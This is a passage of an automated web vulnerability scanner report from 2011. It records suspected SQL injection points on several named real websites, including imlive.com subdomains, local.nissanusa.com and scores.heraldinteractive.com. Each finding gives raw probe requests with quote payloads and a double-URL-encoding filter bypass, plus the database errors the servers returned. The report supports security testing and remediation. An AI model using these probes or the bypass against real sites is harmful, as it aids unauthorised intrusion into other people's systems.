...[SNIP]...

1.11. http://de.imlive.com/waccess/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /waccess'/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess''/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ide=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSSTRTBSD=DEBIMIMACEBMBLPLGCGPGBPD; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 8237
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.12. http://es.imlive.com/waccess/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://es.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /waccess%2527/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:23 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess%2527%2527/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:22 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ies=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSSRTQCRC=BGLJMIMACIIMCJCMFKACJEGI; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:22 GMT
Connection: close
Content-Length: 8230
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.13. http://fr.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://fr.imlive.com
Path:   /waccess/

Issue detail

The gotopage parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gotopage parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/' HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:23 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/'' HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:24 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ifr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQQRCSC=CMMFJIMAHFOLCAODNFPHKCBL; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:23 GMT
Connection: close
Content-Length: 8249
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.14. http://gr.imlive.com/waccess/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://gr.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /waccess%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:34 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess%2527%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:34 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: igr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQQRQRCTC=ABOPGJMANIICBDDCLAFKMEHJ; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:35 GMT
Connection: close
Content-Length: 8333
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.15. http://ib.adnxs.com/getuid [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /getuid HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb; icu=EAAYAA..; uuid2=4760492999213801733; sess=1;

Response 1

HTTP/1.1 500 No url
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 16:46:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 16:46:47 GMT; domain=.adnxs.com; HttpOnly
Date: Fri, 28 Jan 2011 16:46:47 GMT
Content-Length: 0
Connection: close

Request 2

GET /getuid HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb; icu=EAAYAA..; uuid2=4760492999213801733; sess=1;

Response 2

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 16:46:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 16:46:47 GMT; domain=.adnxs.com; HttpOnly
Location: ...C
Date: Fri, 28 Jan 2011 16:46:47 GMT
Content-Length: 0
Connection: close


1.16. http://it.imlive.com/waccess/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://it.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /waccess'/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:08 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess''/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: iit=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQSRBSD=MDONOIMAHFCJJOAEABNJMFBH; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:08 GMT
Connection: close
Content-Length: 8441
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.17. http://local.nissanusa.com/zip.aspx [__utmz cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://local.nissanusa.com
Path:   /zip.aspx

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload " was submitted in the __utmz cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /zip.aspx HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46"; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:06 GMT
Content-Length: 5852
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
</div>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '27'
    AND a.version = 'en'
    AND ac.category_page='ZPA'
AND' at line 5

1.18. http://local.nissanusa.com/zip.aspx [regionalZipCode parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://local.nissanusa.com
Path:   /zip.aspx

Issue detail

The regionalZipCode parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the regionalZipCode parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the regionalZipCode request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /zip.aspx?regionalZipCode=null%2527&vehicle=versa-hatchback&dcp=zmm.50658498.&dcc=39942763.226884546 HTTP/1.1
Host: local.nissanusa.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2010; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; dcc=39942763.226884546; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; visitStart=1; s_sq=%5B%5BB%5D%5D; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.2.10.1296235644

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 01:44:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 01:44:25 GMT
Connection: close
Content-Length: 86332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
32="";

s.eVar48="CrossRegional";
// fire call to omniture
pingOmn();
}

function errorEvent() {
omnFlushObj();
// set variables as required
s.pageName="Regional_Contact_Dealer_"+region+"_Error_FeaLocOffers ";

...[SNIP]...

Request 2

GET /zip.aspx?regionalZipCode=null%2527%2527&vehicle=versa-hatchback&dcp=zmm.50658498.&dcc=39942763.226884546 HTTP/1.1
Host: local.nissanusa.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2010; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; dcc=39942763.226884546; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; visitStart=1; s_sq=%5B%5BB%5D%5D; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.2.10.1296235644

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 01:44:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 01:44:26 GMT
Connection: close
Content-Length: 16098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

1.19. http://local.nissanusa.com/zip.aspx [vehicle parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /zip.aspx

Issue detail

The vehicle parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the vehicle parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /zip.aspx?regionalZipCode=null&vehicle=versa-hatchback'&dcp=zmm.50658498.&dcc=39942763.226884546 HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Fri, 28 Jan 2011 16:59:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 28 Jan 2011 16:59:39 GMT
Content-Length: 5818
Connection: close
Set-Cookie: PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
</div>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '27'
    AND a.version = 'en'
    AND ac.category_page='ZPA'
AND' at line 5

Request 2

GET /zip.aspx?regionalZipCode=null&vehicle=versa-hatchback''&dcp=zmm.50658498.&dcc=39942763.226884546 HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Fri, 28 Jan 2011 16:59:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 28 Jan 2011 16:59:39 GMT
Content-Length: 15976
Connection: close
Set-Cookie: PHPSESSID=s9eoga6caogtb5dnhcsqkqej14; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

1.20. http://nl.imlive.com/waccess/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://nl.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /waccess'/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:27 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess''/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: inl=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQRTQDQC=DLPLFJMAFKGAEJJBLHMDPHAI; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:28 GMT
Connection: close
Content-Length: 8441
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.21. http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx [team parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://scores.heraldinteractive.com
Path:   /aspdata/clients/herald/game.aspx

Issue detail

The team parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the team parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /aspdata/clients/herald/game.aspx?team=028' HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Sat, 29 Jan 2011 01:55:09 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8703

<html>
<head>
<title>Unclosed quotation mark before the character string '028''.<br>Line 1: Incorrect syntax near '028''.</title>
<style>
body {font-family:"Verdana";f
...[SNIP]...

1.22. http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx [team parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://scores.heraldinteractive.com
Path:   /aspdata/clients/herald/nbagame.aspx

Issue detail

The team parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the team parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /aspdata/clients/herald/nbagame.aspx?team=092' HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Sat, 29 Jan 2011 01:55:02 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8732

<html>
<head>
<title>Unclosed quotation mark before the character string '092',1'.<br>Line 1: Incorrect syntax near '092',1'.</title>
<style>
body {font-family:"Verdan
...[SNIP]...

Request 2

GET /aspdata/clients/herald/nbagame.aspx?team=092'' HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
